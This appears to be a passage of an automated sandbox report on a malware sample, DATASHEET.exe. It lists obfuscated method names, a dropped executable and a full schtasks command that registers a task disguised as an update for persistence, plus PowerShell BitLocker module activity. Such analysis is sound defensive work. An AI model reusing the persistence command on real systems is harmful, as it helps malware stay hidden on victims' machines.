                    Source: 0.2.DATASHEET.exe.7dc0000.5.raw.unpack, BaZ0iUKAwYh83l1Hf2.csHigh entropy of concatenated method names: 'TLWaTKgaHe', 'IPkabuA9lr', 'HYOaCWVtY9', 'Y1NaKhF1j2', 'kR9atuZpsB', 'oLDaYdl2t0', 'ASbaBvWDQn', 'QdAawHake1', 'Ajna6ARRTZ', 'chiavut4Zb'
                    Source: 0.2.DATASHEET.exe.7dc0000.5.raw.unpack, QEDDsgrr25uEW9CoI0.csHigh entropy of concatenated method names: 'Dispose', 'ahIyGFPn0e', 'KvcelSfCaX', 'nN1O57iB2N', 'lWoyUKAyvy', 'SD4yzK9j7w', 'ProcessDialogKey', 'ewtes0f1iv', 'NZ4eyweA2X', 'rWmeeyAqiV'
                    Source: 0.2.DATASHEET.exe.7dc0000.5.raw.unpack, I8scn9C6GIjEcHxArD.csHigh entropy of concatenated method names: 'Iy5rEZVLAX', 'oi9rS2Kk19', 'HKjrinkIsZ', 'NpTrM99Dxd', 'y45rcGqjre', 'h61rPTaoUe', 'hbcrkOZUjQ', 'k5IrqrvIte', 'TEsrGJR8gf', 'rtOrUdGu4E'
                    Source: 0.2.DATASHEET.exe.7dc0000.5.raw.unpack, wJhbaDyAPGMNfOyR5ae.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'uqix6g5Mt4', 'nvxxvDsVfu', 'obkxHepAhW', 'fmxxxeoesG', 'sB2xj3njdP', 'TGqx1TSvgr', 'qqsxdtMtA0'
                    Source: 0.2.DATASHEET.exe.7dc0000.5.raw.unpack, V3cqOZAesE1EmDvXZL.csHigh entropy of concatenated method names: 'VCpyF8scn9', 'rGIyQjEcHx', 'YAwyfYh83l', 'vHfyN2n1Ji', 'UcuytFoPo5', 'RXbyYXbsAJ', 'bT1s7c2P3hKm6qUSmI', 'JOFMuIdCdR6mv8L46P', 'e0Zyy3WOKc', 'NiDyIifsMJ'
                    Source: 0.2.DATASHEET.exe.7dc0000.5.raw.unpack, jnBHGqysYMgdlnYN3N2.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'U0kvL6V9oh', 'Om4vg7oeVB', 'nUQvX0cxXy', 'd1HvEnZqXR', 'DvuvSnoPFN', 'iAuviD2evO', 'ViXvMFLIFA'
                    Source: 0.2.DATASHEET.exe.7dc0000.5.raw.unpack, GCPTAxP9imPhZTyIf3.csHigh entropy of concatenated method names: 'iIfBqDAghg', 'VIpBUckUAk', 'Foqws3lhEd', 'u3owyBXHcq', 'tGSBLgv2dE', 'YZHBghTAxG', 'nVqBX791qC', 'NZ6BEKxgEG', 'wCQBSjr2oo', 'eq6BiHetc3'
                    Source: 0.2.DATASHEET.exe.7dc0000.5.raw.unpack, FYAeKLMA8yAgvrHoxk.csHigh entropy of concatenated method names: 'HUyBfJZPwj', 'owCBNCOe5n', 'ToString', 'zMOB72DP5l', 'H66BrC2x51', 'oRbBaWmVeg', 'MPVBoYWDdt', 'OnGB8vuRWy', 'dHEBFAFfWr', 'q1pBQySFZ6'
                    Source: 0.2.DATASHEET.exe.7dc0000.5.raw.unpack, KNgHN0zLKC1Jc463uN.csHigh entropy of concatenated method names: 'NsyvblJvOt', 'Rx8vCIRKlo', 'V4JvKPXiAr', 'YQfvVabFn7', 'vVSvldMgnA', 'jTxvZ6kKrU', 'NOlv0CSVri', 'zDVvdI9w35', 'Vjqv3hCUDC', 'nX4vJj6ywD'
                    Source: 0.2.DATASHEET.exe.7dc0000.5.raw.unpack, PEVbtayIbmv8k5aL9ws.csHigh entropy of concatenated method names: 'gPGHUbJPdN', 'WNlHz4LwOK', 'V7AxsZ67VX', 'zo2r9fKKfl4DrSF1V0R', 'WjodYbKDLA0IRG5b8LV', 'vDUhQQKbRaPEpp12ZI8', 'xGiCySKcsj4fHQfGRu5'
                    Source: 0.2.DATASHEET.exe.7dc0000.5.raw.unpack, M1JiK32aM0A4fccuFo.csHigh entropy of concatenated method names: 'y1foD4uv47', 'CUaoOROQ10', 'eAtapkHkcH', 'uaqaZWTTXp', 'dPIa0v8SIt', 'AguamgVOQ5', 'b0Oa4DJ7EV', 'udTanCp6ol', 'Wvua9nOJWF', 'qlFahG8Z8C'
                    Source: 0.2.DATASHEET.exe.7dc0000.5.raw.unpack, TcVXB1yyf2c1jLF8p1a.csHigh entropy of concatenated method names: 'NVTvUFeThe', 'wvsvzXNiTR', 'xerHs1gEcH', 'YtvHyfiNFA', 'H8yHels5Eh', 'IreHIYmKIW', 'UerHAokRtg', 'G0FHRvDcu5', 'oToH78jMq1', 'g5XHr4TLqx'
                    Source: 0.2.DATASHEET.exe.7dc0000.5.raw.unpack, Vo5EXbVXbsAJDfhySe.csHigh entropy of concatenated method names: 'bhw8Rr76ve', 'PWu8r7n0lp', 'w4g8o82XyC', 'Ntc8FLng2d', 'OK18QbbVWb', 'U0Moc97UIC', 'hbGoPMPt2V', 'CRAokcSAyA', 'WEfoq8gf7T', 'QrroGLKKeV'
                    Source: 0.2.DATASHEET.exe.7dc0000.5.raw.unpack, Jmbqtl4LqmH0YgMqIa.csHigh entropy of concatenated method names: 'eCbF7NwAZL', 'nrRFacyO1R', 'htLF81pCpb', 'qoG8UPvi8S', 'yjP8zq0sLR', 'paLFsEr8Iq', 'VtUFyjG3QZ', 'A8eFeaRgYb', 'GcYFIqMOs6', 'kw7FAUvFI0'
                    Source: 0.2.DATASHEET.exe.7dc0000.5.raw.unpack, WnZO5RiJnhLBD1MFiU.csHigh entropy of concatenated method names: 'ToString', 'jg8YL2pgcw', 'tvfYlpfhXC', 'MUJYpPTXXM', 'wjbYZ6t7EC', 'PJcY0KMR6u', 'ak1YmLUmv2', 'rbMY4eIywf', 'QDHYnfjD05', 'BY1Y91KJhf'
                    Source: 0.2.DATASHEET.exe.7dc0000.5.raw.unpack, bAqiVXUX8tCLRpSKjC.csHigh entropy of concatenated method names: 'ibQvasnsRQ', 'MaOvoROFsV', 'xIfv8Vix6I', 'lIRvFuyJIi', 'Fxfv6SBQxa', 'VtHvQtD5RN', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.DATASHEET.exe.7dc0000.5.raw.unpack, PtyqXWkddyhIFPn0eW.csHigh entropy of concatenated method names: 'hqi6tDGZ6t', 'bni6BgmThY', 'DSU66cAymH', 'OoU6HRC9WX', 'd6M6j5Kidp', 'gCH6dPPKaG', 'Dispose', 'Edhw7l2Vy6', 'a0mwrFDH4S', 'jvhwa1taOJ'
                    Source: 0.2.DATASHEET.exe.7dc0000.5.raw.unpack, AMPI2OQw9LBFRkO0xI.csHigh entropy of concatenated method names: 'EoVIR7NLjO', 'XegI7leAnr', 'aehIrgvL7Z', 'QxtIaKlDIS', 'shTIocCNSj', 'SA3I8oZt3U', 'IsWIF1nS3W', 'B82IQ9SCDr', 'kUCIWajXZM', 'PwHIfMakiv'
                    Source: 0.2.DATASHEET.exe.7dc0000.5.raw.unpack, o0f1ivG9Z4weA2XwWm.csHigh entropy of concatenated method names: 'jqI6VBEMya', 'M866l9jpUy', 'mSh6pDMcQa', 'd8h6Z0uXda', 'b7m60x9WZL', 'phi6mxs5E5', 'GVb64xQEcF', 'CeD6nIQTgF', 'YbO698CaOa', 'fyx6hXmHFR'
                    Source: 0.2.DATASHEET.exe.3f39880.1.raw.unpack, DigqPdeF2Byu3IrVKo.csHigh entropy of concatenated method names: 'JxN53qQlS', 'NISTSKwmx', 'xcFbKNDfg', 'C68OZOY2g', 'pDBKPvgAV', 'Hht2feTo8', 'TgMBuPNLEeHMTXNgCB', 'eDTgBYHnboRfP1LSUc', 'sxSwcKHp1', 'HH2vxif6W'
                    Source: 0.2.DATASHEET.exe.3f39880.1.raw.unpack, QE8Pv79ocLOef81dvY.csHigh entropy of concatenated method names: 'VMcF3hOvBq', 'pC7FJgjNW9', 'w0AF5Xuj0n', 'fWtFTcwAKl', 'zh2FDes6ta', 'ucLFbI2B4R', 'zbfFOdkG7v', 'eVqFC2Z7yV', 'g9aFKvZNQv', 'EIPF2IsxFs'
                    Source: 0.2.DATASHEET.exe.3f39880.1.raw.unpack, KaFIOWXPcSfy2l8Ts8.csHigh entropy of concatenated method names: 'c69uCjUJ18', 'O5KuKOpRcP', 'qjduVLPRyq', 'SpKule8AEq', 'PtWuZxLCPZ', 'Bl8u075qXQ', 'MFau4NDCYa', 'wWnunOsrfh', 'HTLuh9sZ83', 'EI0uLpMKgv'
                    Source: 0.2.DATASHEET.exe.3f39880.1.raw.unpack, MjyTDcEikv92nHoltS.csHigh entropy of concatenated method names: 'Yd6thm19yV', 'vlVtgtqpp4', 'xrmtEKpAYW', 'qo0tSU898H', 'H7ntlhpEu1', 'd5utprsGJH', 'vSOtZat6Ga', 'q05t0eihnI', 'txCtmpWNER', 'R4qt49qhh2'
                    Source: 0.2.DATASHEET.exe.3f39880.1.raw.unpack, BaZ0iUKAwYh83l1Hf2.csHigh entropy of concatenated method names: 'TLWaTKgaHe', 'IPkabuA9lr', 'HYOaCWVtY9', 'Y1NaKhF1j2', 'kR9atuZpsB', 'oLDaYdl2t0', 'ASbaBvWDQn', 'QdAawHake1', 'Ajna6ARRTZ', 'chiavut4Zb'
                    Source: 0.2.DATASHEET.exe.3f39880.1.raw.unpack, QEDDsgrr25uEW9CoI0.csHigh entropy of concatenated method names: 'Dispose', 'ahIyGFPn0e', 'KvcelSfCaX', 'nN1O57iB2N', 'lWoyUKAyvy', 'SD4yzK9j7w', 'ProcessDialogKey', 'ewtes0f1iv', 'NZ4eyweA2X', 'rWmeeyAqiV'
                    Source: 0.2.DATASHEET.exe.3f39880.1.raw.unpack, I8scn9C6GIjEcHxArD.csHigh entropy of concatenated method names: 'Iy5rEZVLAX', 'oi9rS2Kk19', 'HKjrinkIsZ', 'NpTrM99Dxd', 'y45rcGqjre', 'h61rPTaoUe', 'hbcrkOZUjQ', 'k5IrqrvIte', 'TEsrGJR8gf', 'rtOrUdGu4E'
                    Source: 0.2.DATASHEET.exe.3f39880.1.raw.unpack, wJhbaDyAPGMNfOyR5ae.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'uqix6g5Mt4', 'nvxxvDsVfu', 'obkxHepAhW', 'fmxxxeoesG', 'sB2xj3njdP', 'TGqx1TSvgr', 'qqsxdtMtA0'
                    Source: 0.2.DATASHEET.exe.3f39880.1.raw.unpack, V3cqOZAesE1EmDvXZL.csHigh entropy of concatenated method names: 'VCpyF8scn9', 'rGIyQjEcHx', 'YAwyfYh83l', 'vHfyN2n1Ji', 'UcuytFoPo5', 'RXbyYXbsAJ', 'bT1s7c2P3hKm6qUSmI', 'JOFMuIdCdR6mv8L46P', 'e0Zyy3WOKc', 'NiDyIifsMJ'
                    Source: 0.2.DATASHEET.exe.3f39880.1.raw.unpack, jnBHGqysYMgdlnYN3N2.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'U0kvL6V9oh', 'Om4vg7oeVB', 'nUQvX0cxXy', 'd1HvEnZqXR', 'DvuvSnoPFN', 'iAuviD2evO', 'ViXvMFLIFA'
                    Source: 0.2.DATASHEET.exe.3f39880.1.raw.unpack, GCPTAxP9imPhZTyIf3.csHigh entropy of concatenated method names: 'iIfBqDAghg', 'VIpBUckUAk', 'Foqws3lhEd', 'u3owyBXHcq', 'tGSBLgv2dE', 'YZHBghTAxG', 'nVqBX791qC', 'NZ6BEKxgEG', 'wCQBSjr2oo', 'eq6BiHetc3'
                    Source: 0.2.DATASHEET.exe.3f39880.1.raw.unpack, FYAeKLMA8yAgvrHoxk.csHigh entropy of concatenated method names: 'HUyBfJZPwj', 'owCBNCOe5n', 'ToString', 'zMOB72DP5l', 'H66BrC2x51', 'oRbBaWmVeg', 'MPVBoYWDdt', 'OnGB8vuRWy', 'dHEBFAFfWr', 'q1pBQySFZ6'
                    Source: 0.2.DATASHEET.exe.3f39880.1.raw.unpack, KNgHN0zLKC1Jc463uN.csHigh entropy of concatenated method names: 'NsyvblJvOt', 'Rx8vCIRKlo', 'V4JvKPXiAr', 'YQfvVabFn7', 'vVSvldMgnA', 'jTxvZ6kKrU', 'NOlv0CSVri', 'zDVvdI9w35', 'Vjqv3hCUDC', 'nX4vJj6ywD'
                    Source: 0.2.DATASHEET.exe.3f39880.1.raw.unpack, PEVbtayIbmv8k5aL9ws.csHigh entropy of concatenated method names: 'gPGHUbJPdN', 'WNlHz4LwOK', 'V7AxsZ67VX', 'zo2r9fKKfl4DrSF1V0R', 'WjodYbKDLA0IRG5b8LV', 'vDUhQQKbRaPEpp12ZI8', 'xGiCySKcsj4fHQfGRu5'
                    Source: 0.2.DATASHEET.exe.3f39880.1.raw.unpack, M1JiK32aM0A4fccuFo.csHigh entropy of concatenated method names: 'y1foD4uv47', 'CUaoOROQ10', 'eAtapkHkcH', 'uaqaZWTTXp', 'dPIa0v8SIt', 'AguamgVOQ5', 'b0Oa4DJ7EV', 'udTanCp6ol', 'Wvua9nOJWF', 'qlFahG8Z8C'
                    Source: 0.2.DATASHEET.exe.3f39880.1.raw.unpack, TcVXB1yyf2c1jLF8p1a.csHigh entropy of concatenated method names: 'NVTvUFeThe', 'wvsvzXNiTR', 'xerHs1gEcH', 'YtvHyfiNFA', 'H8yHels5Eh', 'IreHIYmKIW', 'UerHAokRtg', 'G0FHRvDcu5', 'oToH78jMq1', 'g5XHr4TLqx'
                    Source: 0.2.DATASHEET.exe.3f39880.1.raw.unpack, Vo5EXbVXbsAJDfhySe.csHigh entropy of concatenated method names: 'bhw8Rr76ve', 'PWu8r7n0lp', 'w4g8o82XyC', 'Ntc8FLng2d', 'OK18QbbVWb', 'U0Moc97UIC', 'hbGoPMPt2V', 'CRAokcSAyA', 'WEfoq8gf7T', 'QrroGLKKeV'
                    Source: 0.2.DATASHEET.exe.3f39880.1.raw.unpack, Jmbqtl4LqmH0YgMqIa.csHigh entropy of concatenated method names: 'eCbF7NwAZL', 'nrRFacyO1R', 'htLF81pCpb', 'qoG8UPvi8S', 'yjP8zq0sLR', 'paLFsEr8Iq', 'VtUFyjG3QZ', 'A8eFeaRgYb', 'GcYFIqMOs6', 'kw7FAUvFI0'
                    Source: 0.2.DATASHEET.exe.3f39880.1.raw.unpack, WnZO5RiJnhLBD1MFiU.csHigh entropy of concatenated method names: 'ToString', 'jg8YL2pgcw', 'tvfYlpfhXC', 'MUJYpPTXXM', 'wjbYZ6t7EC', 'PJcY0KMR6u', 'ak1YmLUmv2', 'rbMY4eIywf', 'QDHYnfjD05', 'BY1Y91KJhf'
                    Source: 0.2.DATASHEET.exe.3f39880.1.raw.unpack, bAqiVXUX8tCLRpSKjC.csHigh entropy of concatenated method names: 'ibQvasnsRQ', 'MaOvoROFsV', 'xIfv8Vix6I', 'lIRvFuyJIi', 'Fxfv6SBQxa', 'VtHvQtD5RN', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.DATASHEET.exe.3f39880.1.raw.unpack, PtyqXWkddyhIFPn0eW.csHigh entropy of concatenated method names: 'hqi6tDGZ6t', 'bni6BgmThY', 'DSU66cAymH', 'OoU6HRC9WX', 'd6M6j5Kidp', 'gCH6dPPKaG', 'Dispose', 'Edhw7l2Vy6', 'a0mwrFDH4S', 'jvhwa1taOJ'
                    Source: 0.2.DATASHEET.exe.3f39880.1.raw.unpack, AMPI2OQw9LBFRkO0xI.csHigh entropy of concatenated method names: 'EoVIR7NLjO', 'XegI7leAnr', 'aehIrgvL7Z', 'QxtIaKlDIS', 'shTIocCNSj', 'SA3I8oZt3U', 'IsWIF1nS3W', 'B82IQ9SCDr', 'kUCIWajXZM', 'PwHIfMakiv'
                    Source: 0.2.DATASHEET.exe.3f39880.1.raw.unpack, o0f1ivG9Z4weA2XwWm.csHigh entropy of concatenated method names: 'jqI6VBEMya', 'M866l9jpUy', 'mSh6pDMcQa', 'd8h6Z0uXda', 'b7m60x9WZL', 'phi6mxs5E5', 'GVb64xQEcF', 'CeD6nIQTgF', 'YbO698CaOa', 'fyx6hXmHFR'
                    Source: C:\Users\user\Desktop\DATASHEET.exeFile created: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwvzGqkYNEejno" /XML "C:\Users\user\AppData\Local\Temp\tmp8AFA.tmp"

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
